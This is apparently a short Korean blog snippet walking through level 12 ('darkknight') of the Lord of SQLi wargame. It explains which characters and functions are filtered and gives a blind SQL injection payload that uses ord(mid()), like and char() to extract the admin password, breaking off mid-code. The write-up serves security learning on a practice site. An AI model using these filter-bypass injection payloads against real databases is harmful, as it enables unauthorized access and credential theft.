[LOS] 12번 darkknight 문제풀이
https://los.rubiya.kr/ 레벨 12번 darkknight 풀이 제시문제 ※ url에 ?를 쓰면 query를 날릴 수 있다. 쿼리문으로 유추할 수 있는 부분 1. 직접 password를 알아내야한다. > 자동화 코드 2. Ascii, substr, =, ' 등을 사용할 수 없다. >ord(mid()) like 1 로 우회 3. no 부분에 '사용이 필요없어 우회가 가능하다. 4. id='admin' 시 =와 ' 쓰임이 불가능하다. id like char()로 우회 param = {"pw":"1","no":"1 or id like char(97,100,109,105,110) and ord(mid(pw, {}, 1)) > {} # ".format(i+1, value)} req = request..
2022. 1. 17.